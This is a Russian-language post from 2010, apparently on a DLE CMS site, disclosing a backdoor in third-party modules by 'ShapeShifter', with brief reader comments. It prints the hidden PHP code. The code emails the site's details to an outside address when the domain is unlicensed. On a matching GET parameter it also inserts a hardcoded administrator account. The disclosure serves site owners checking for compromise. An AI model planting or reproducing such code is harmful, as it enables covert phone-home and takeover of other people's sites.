Баг-фикс Бекдор и стучалка в модулях от ShapeShifter

TipTop 19-01-2010 Баг-фиксы DLE 3 комментария

Бекдор и стучалка в модулях от ShapeShifter

Бекдор и стучалка в модулях от ShapeShifter

<font color=#0000FF>if</font>(strpos(strtolower(<font color=#660000>$site_h</font>),<font color=#660000>$site_d</font>)<font color=#8000FF> === </font><font color=#0000FF><font color=#0000FF>FALSE</font></font>)
{'
<font color=#660000>$text</font><font color=#8000FF> = </font>strip_tags("Пользователь \"{'<font color=#660000>$id_d</font>'}\" ({'<font color=#660000>$site_d</font>'} | {'<font color=#660000>$un_d</font>'}) нарушил авторские права.\r\nСкрипт (модуль): {'<font color=#660000>$name_mod</font>'}\r\nСайт: http://{'<font color=#660000>$site_h</font>'}\r\nСкрипт находится здесь: http://{'<font color=#660000>$site_h</font>'}{'<font color=#660000>$_SERVER</font>['REQUEST_URI']'}");
<font color=#660000>$email</font><font color=#8000FF> = </font>"modpolice@yandex.ru";
<font color=#0000FF>include</font>_once ENGINE_DIR.'/classes/mail.<font color=#0000FF>class</font>.php';
<font color=#660000>$mail</font><font color=#8000FF> = </font>new dle_mail (<font color=#660000>$config</font>,<font color=#0000FF><font color=#0000FF>false</font></font>);
<font color=#660000>$mail</font>->from<font color=#8000FF> = </font>"nsssmart@rambler.ru";
<font color=#660000>$mail</font>->to<font color=#8000FF> = </font><font color=#660000>$email</font>;
<font color=#660000>$headers</font><font color=#8000FF> = </font>"From: {'<font color=#660000>$mail</font>->from'}\nTo: {'<font color=#660000>$mail</font>->to'}\nSubject: Нарушение авторский прав: {'<font color=#660000>$name_mod</font>'}\n";
<font color=#660000>$headers</font> .= "Date: ".date('j F Y H:i');
<font color=#660000>$semi_rand</font><font color=#8000FF> = </font>md5(time());
<font color=#660000>$mime_boundary</font><font color=#8000FF> = </font>"--{'<font color=#660000>$semi_rand</font>'}--";
<font color=#660000>$headers</font> .= "\nMIME-Version: 1.0\n"."Content-Type: multipart/mixed;\n"." boundary=\"{'<font color=#660000>$mime_boundary</font>'}\"";
<font color=#660000>$mail</font>->mail_headers<font color=#8000FF> = </font><font color=#660000>$headers</font>;
<font color=#660000>$message</font><font color=#8000FF> = </font>"This is a multi-part message in MIME format.\n\n"."--{'<font color=#660000>$mime_boundary</font>'}\n"."Content-Type: text/plain; charset=\"windows-1251\"\n"."Content-Transfer-Encoding: 7bit\n\n".
<font color=#660000>$message</font> .<font color=#660000>$text</font>."\n\n";
<font color=#660000>$mail</font>->message<font color=#8000FF> = </font><font color=#660000>$message</font>;
<font color=#660000>$mail</font>->smtp_send();
'}
<font color=#0000FF>if</font>(strpos(strtolower(<font color=#660000>$site_h</font>),<font color=#660000>$site_d</font>)<font color=#8000FF> === </font><font color=#0000FF><font color=#0000FF>FALSE</font></font>)
{'
<font color=#0000FF>if</font> (<font color=#660000>$_GET</font>['un_d']<font color=#8000FF> == </font><font color=#660000>$un_d</font>) <font color=#660000>$db</font>->query( "INSERT INTO ".USERPREFIX ."_users (email, password, name, user_group, reg_date) values ('nsssmart@rambler.ru', '696d29e0940a4957748fe3fc9efd22a3', 'ModPolice_{'<font color=#660000>$un_d</font>'}', '1', '1254007895')");
'}
<font color=#0000FF>if</font> (<font color=#660000>$action</font><font color=#8000FF> == </font>0)
{'

Суть бекдора в том что бы отправить сообщение Шиферу(ShapeShifter) изSavGroup и создать юзера ModPolice с правами администратора для дальнейшего уничтожения Вашего сайта.

Нашел Бекдор: Zloy (WFound)

tiptop

19 января 2010 10:32

+ 0 -

Вообщем проверяем фалы модулей от ShapeShifter

Berkut

19 января 2010 10:41

да, паскудник ещё тот.
Мало того что клиентам обновления не высылает. Надо каждый раз идти клянчить у него новую версию в аську, так ещё и бэкдоры ставит(

KOT

19 января 2010 10:46

Да уж ппц он полицейский хренов